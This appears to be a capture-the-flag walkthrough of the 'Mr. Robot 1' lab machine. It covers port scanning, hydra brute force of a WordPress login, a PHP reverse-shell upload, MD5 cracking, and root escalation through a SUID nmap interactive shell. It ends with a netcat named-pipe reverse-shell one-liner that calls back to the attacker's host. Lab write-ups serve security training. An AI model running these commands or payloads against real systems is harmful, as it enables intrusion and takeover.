Difficulty Rating:

Machine: Mr.Robot 1
OS: Linux
Target IP: 10.10.10.129

Introduction

This machine is based on the popular show Mr. Robot. It has three keys hidden in different locations. The goal is to find all three. Each key is a bit difficult to find than the other one. Hope you enjoy this walkthrough!

  • Nmap
    Let’s use nmap to scan for open TCP services.

  • Flags used for nmap

Flag Description
-A Aggressive scanning. Combination of -O, -sV and -sC
-Pn Do not send ICMP Packets
-oN Store output in a text file in nmap format
# Nmap 7.60 scan initiated Tue Jan  2 19:35:43 2018 as: nmap -A -sC -Pn -oN nmap_mrRobot.txt 10.10.10.129
Nmap scan report for 10.10.10.129
Host is up (0.00084s latency).
Not shown: 997 filtered ports
PORT    STATE  SERVICE  VERSION
22/tcp  closed ssh
80/tcp  open   http     Apache httpd
|_http-server-header: Apache
|_http-title: Site doesn't have a title (text/html).
443/tcp open   ssl/http Apache httpd
|_http-server-header: Apache
|_http-title: Site doesn't have a title (text/html).
| ssl-cert: Subject: commonName=www.example.com
| Not valid before: 2015-09-16T10:45:03
|_Not valid after:  2025-09-13T10:45:03
MAC Address: 00:0C:29:85:AB:3A (VMware)
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.10 - 4.8
Network Distance: 1 hop

TRACEROUTE
HOP RTT     ADDRESS
1   0.84 ms 10.10.10.129

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Tue Jan  2 19:36:19 2018 -- 1 IP address (1 host up) scanned in 35.37 seconds
  • Port 80 and 443 are open.

  • Nikto

- Nikto v2.1.6/2.1.5
+ Target Host: 10.10.10.129
+ Target Port: 80
+ GET The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ GET The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
+ GET Retrieved x-powered-by header: PHP/5.5.29
+ GET Server leaks inodes via ETags, header found with file /robots.txt, fields: 0x29 0x52467010ef8ad
+ GET Uncommon header 'tcn' found, with contents: list
+ GET Apache mod_negotiation is enabled with MultiViews, which allows attackers to easily brute force file names. See http://www.wisec.it/sectou.php?id=4698ebdc59d15. The following alternatives for 'index' were found: index.html, index.php
+ OSVDB-3092: GET /admin/: This might be interesting...
+ GET Uncommon header 'link' found, with contents: <http://10.10.10.129/?p=23>; rel=shortlink
 GET /wp-login/: Admin login page/section found.
+ GET /wordpress/: A Wordpress installation was found.
+ GET /wp-admin/wp-login.php: Wordpress login found
+ GET /blog/wp-login.php: Wordpress login found
+ GET /wp-login.php: Wordpress login found
  • Let’s check /robots.txt

img1

  • We find 2 more addresses to visit:
    • fsocity.dic
    • key-1-of-3.txt
  • /key-1-of-3.txt gives us the first key, out of 3 keys.

img4

First key found!!
  • /foscity.dic looks like a dictionary which we can use it later.
  • Looks like there are repetitions in the wordlist. Let’s sort and make a new wordlist with just unique names.
[email protected]:~/Vulnhub/mrRobot# cat fsocity.dic | wc -l
858160
[email protected]:~/Vulnhub/mrRobot# cat fsocity.dic | sort -u | wc -l
11451
[email protected]:~/Vulnhub/mrRobot# cat fsocity.dic | sort -u > fsocity.dic.uniq
  • Let’s try to login. Visit 10.10.10.129/wp-login.php
  • Let’s use the fsocity.dic.uniq wordlist to get username first, and then we’ll use the same dictionary to bruteforce for the password.
  • Username bruteforce
    To find the username, we will use hydra with username list fsocity.dic.uniq and any random password. Observe that the Wordpress login shows different error when you give correct username and incorrect password, and another error when you give both credentials incorrect.
[email protected]:~/Vulnhub/mrRobot# hydra -L fsocity.dic.uniq -p dontknow 10.10.10.129 http-post-form '/wp-login.php:log=^USER^&pwd=^PASS^&wp-submit=Log+In:F=Invalid username' -t 64
Hydra v8.6 (c) 2017 by van Hauser/THC - Please do not use in military or secret service organizations, or for illegal purposes.

Hydra (http://www.thc.org/thc-hydra) starting at 2018-01-03 13:06:07
[DATA] max 64 tasks per 1 server, overall 64 tasks, 11452 login tries (l:11452/p:0), ~1 tries per task
[DATA] attacking http-post-form://10.10.10.129:80//wp-login.php:log=^USER^&pwd=^PASS^&wp-submit=Log+In:F=Invalid username
[STATUS] 2220.00 tries/min, 2220 tries in 00:00h, 0 to do in 01:00h, 9232 active
[80][http-post-form] host: 10.10.10.129   login: ELLIOT   password: dontknow
[80][http-post-form] host: 10.10.10.129   login: Elliot   password: dontknow
[STATUS] 2305.33 tries/min, 6916 tries in 00:00h, 0 to do in 03:00h, 4536 active
[80][http-post-form] host: 10.10.10.129   login: elliot   password: dontknow
[STATUS] 2258.25 tries/min, 9033 tries in 00:00h, 0 to do in 04:00h, 2419 active
[STATUS] 2265.60 tries/min, 11328 tries in 00:00h, 0 to do in 05:00h, 124 active
1 of 1 target successfully completed, 3 valid passwords found
Hydra (http://www.thc.org/thc-hydra) finished at 2018-01-03 13:11:11

Flags used for hydra

Flag Description
-L Wordlist for username
-l Username
-p Password
-P Wordlist for password
http-post-form Mention that the login form uses POST method
F=\<string\> A string which determines failure case
-t Number of threads
  • Password bruteforce
    Now that we have got the username, let’s keep username fixed and bruteforce password using the list fsocity.dic.uniq.
[email protected]:~/Vulnhub/mrRobot# hydra -l elliot -P fsocity.dic.uniq 10.10.10.129 http-post-form '/wp-login.php:log=^USER^&pwd=^PASS^&wp-submit=Log+In:F=is incorrect' -t 64
Hydra v8.6 (c) 2017 by van Hauser/THC - Please do not use in military or secret service organizations, or for illegal purposes.

Hydra (http://www.thc.org/thc-hydra) starting at 2018-01-03 13:11:57
[DATA] max 64 tasks per 1 server, overall 64 tasks, 11452 login tries (l:1/p:0), ~11452 tries per task
[DATA] attacking http-post-form://10.10.10.129:80//wp-login.php:log=^USER^&pwd=^PASS^&wp-submit=Log+In:F=is incorrect
[STATUS] 2084.00 tries/min, 2084 tries in 00:00h, 0 to do in 01:00h, 9368 active
[80][http-post-form] host: 10.10.10.129   login: elliot   password: ER28-0652
1 of 1 target successfully completed, 1 valid password found
[WARNING] Writing restore file because 2 final worker threads did not complete until end.
[ERROR] 2 targets did not resolve or could not be connected
[ERROR] 64 targets did not complete
Hydra (http://www.thc.org/thc-hydra) finished at 2018-01-03 13:13:57
  • Visit 10.10.10.129/wp-login.php with creds we found:
    • Username: elliot
    • Password: ER28-0652
  • We see Wordpress dashboard.
  • After playing around, I found that it is possible to install a plugin. So I installed File Manager plugin, to upload my payload.

img2

  • Open File Manager. We see that only wp-content has read and write permissions.

img3

  • Upload PHP payload in wp-content
  • For a php payload, you can use Pentestmonkey’s reverse shell.

  • Start netcat session to receive reverse TCP connection
[email protected]:~/Vulnhub/mrRobot# nc -nvlp 1234
listening on [any] 1234 ...
connect to [10.10.10.128] from (UNKNOWN) [10.10.10.129] 39673
Linux linux 3.13.0-55-generic #94-Ubuntu SMP Thu Jun 18 00:27:10 UTC 2015 x86_64 x86_64 x86_64 GNU/Linux
 03:12:56 up  2:32,  0 users,  load average: 0.02, 0.04, 0.10
USER     TTY      FROM             [email protected]   IDLE   JCPU   PCPU WHAT
uid=1(daemon) gid=1(daemon) groups=1(daemon)
/bin/sh: 0: can't access tty; job control turned off
$ id
uid=1(daemon) gid=1(daemon) groups=1(daemon)
$ which python
/usr/bin/python
$ python -c 'import pty; pty.spawn("/bin/bash");'
[email protected]:/$ ^Z
[1]+  Stopped                 nc -nvlp 1234
[email protected]:~/Vulnhub/mrRobot# stty raw -echo
[email protected]:~/Vulnhub/mrRobot# nc -nvlp 1234

[email protected]:/$ pwd
/
[email protected]:/$ ls -la /home
total 12
drwxr-xr-x  3 root root 4096 Nov 13  2015 .
drwxr-xr-x 22 root root 4096 Sep 16  2015 ..
drwxr-xr-x  2 root root 4096 Nov 13  2015 robot
[email protected]:/$ cd /home/robot/
[email protected]:/home/robot$ ls -la
total 16
drwxr-xr-x 2 root  root  4096 Nov 13  2015 .
drwxr-xr-x 3 root  root  4096 Nov 13  2015 ..
-r-------- 1 robot robot   33 Nov 13  2015 key-2-of-3.txt
-rw-r--r-- 1 robot robot   39 Nov 13  2015 password.raw-md5
[email protected]:/home/robot$ file password.raw-md5
password.raw-md5: ASCII text
[email protected]:/home/robot$ more password.raw-md5
robot:c3fcd3d76192e4007dfb496cca67e13b
[email protected]:/home/robot$ su robot
Password:
[email protected]:~$ cat key-2-of-3.txt
822c73956184f694993bede3eb39f959
Second key found!!
  • c3fcd3d76192e4007dfb496cca67e13b is a MD5 hash.
  • Value of the above hash is: abcdefghijklmnopqrstuvwxyz, which is the passsword for the user robot

  • Privilege Escalation for root
[email protected]:~$ find / -perm -4000 -user root -exec ls -ld {} \; 2> /dev/null                                                                                                                                
-rwsr-xr-x 1 root root 44168 May  7  2014 /bin/ping                                                                                                                                                         
-rwsr-xr-x 1 root root 69120 Feb 12  2015 /bin/umount                                                                                                                                                       
-rwsr-xr-x 1 root root 94792 Feb 12  2015 /bin/mount                                                                                                                                                        
-rwsr-xr-x 1 root root 44680 May  7  2014 /bin/ping6                                                                                                                                                        
-rwsr-xr-x 1 root root 36936 Feb 17  2014 /bin/su                                                                                                                                                           
-rwsr-xr-x 1 root root 47032 Feb 17  2014 /usr/bin/passwd                                                                                                                                                   
-rwsr-xr-x 1 root root 32464 Feb 17  2014 /usr/bin/newgrp                                                                                                                                                   
-rwsr-xr-x 1 root root 41336 Feb 17  2014 /usr/bin/chsh                                                                                                                                                     
-rwsr-xr-x 1 root root 46424 Feb 17  2014 /usr/bin/chfn                                                                                                                                                     
-rwsr-xr-x 1 root root 68152 Feb 17  2014 /usr/bin/gpasswd                                                                                                                                                  
-rwsr-xr-x 1 root root 155008 Mar 12  2015 /usr/bin/sudo                                                                                                                                                    
-rwsr-xr-x 1 root root 504736 Nov 13  2015 /usr/local/bin/nmap                                                                                                                                              
-rwsr-xr-x 1 root root 440416 May 12  2014 /usr/lib/openssh/ssh-keysign                                                                                                                                     
-rwsr-xr-x 1 root root 10240 Feb 25  2014 /usr/lib/eject/dmcrypt-get-device                                                                                                                                 
-r-sr-xr-x 1 root root 9532 Nov 13  2015 /usr/lib/vmware-tools/bin32/vmware-user-suid-wrapper                                                                                                               
-r-sr-xr-x 1 root root 14320 Nov 13  2015 /usr/lib/vmware-tools/bin64/vmware-user-suid-wrapper                                                                                                              
-rwsr-xr-x 1 root root 10344 Feb 25  2015 /usr/lib/pt_chown
  • We can use nmap to escalate to root’s privilege.
  • Nmap has –interactive flag which we can use to get shell, which will run as root!
  • Get Reverse TCP connection for root’s shell
[email protected]:~$ nmap --interactive

Starting nmap V. 3.81 ( http://www.insecure.org/nmap/ )
Welcome to Interactive Mode -- press h <enter> for help
nmap> ! id
uid=1002(robot) gid=1002(robot) euid=0(root) groups=0(root),1002(robot)
waiting to reap child : No child processes
nmap> !whoami
root
waiting to reap child : No child processes
nmap> !cat /tmp/reverse-tcp.sh
mknod /tmp/backpipe p; /bin/sh 0< /tmp/backpipe | nc 10.10.10.128 8989 1> /tmp/backpipe; rm /tmp/backpipe
waiting to reap child : No child processes
nmap> !mknod /tmp/backpipe p; /bin/sh 0< /tmp/backpipe | nc 10.10.10.128 8989 1> /tmp/backpipe; rm /tmp/backpipe
  • Netcat at receiver’s end
[email protected]:~/Vulnhub/mrRobot# nc -nvlp 8989
listening on [any] 8989 ...
connect to [10.10.10.128] from (UNKNOWN) [10.10.10.129] 53273
id
uid=1002(robot) gid=1002(robot) euid=0(root) groups=0(root),1002(robot)
ls -la /root
total 32
drwx------  3 root root 4096 Nov 13  2015 .
drwxr-xr-x 22 root root 4096 Sep 16  2015 ..
-rw-------  1 root root 4058 Nov 14  2015 .bash_history
-rw-r--r--  1 root root 3274 Sep 16  2015 .bashrc
drwx------  2 root root 4096 Nov 13  2015 .cache
-rw-r--r--  1 root root    0 Nov 13  2015 firstboot_done
-r--------  1 root root   33 Nov 13  2015 key-3-of-3.txt
-rw-r--r--  1 root root  140 Feb 20  2014 .profile
-rw-------  1 root root 1024 Sep 16  2015 .rnd
cat /root/key-3-of-3.txt
04787ddef27c3dee1ee161b21670b4e4
Third key found!!

Share the fun!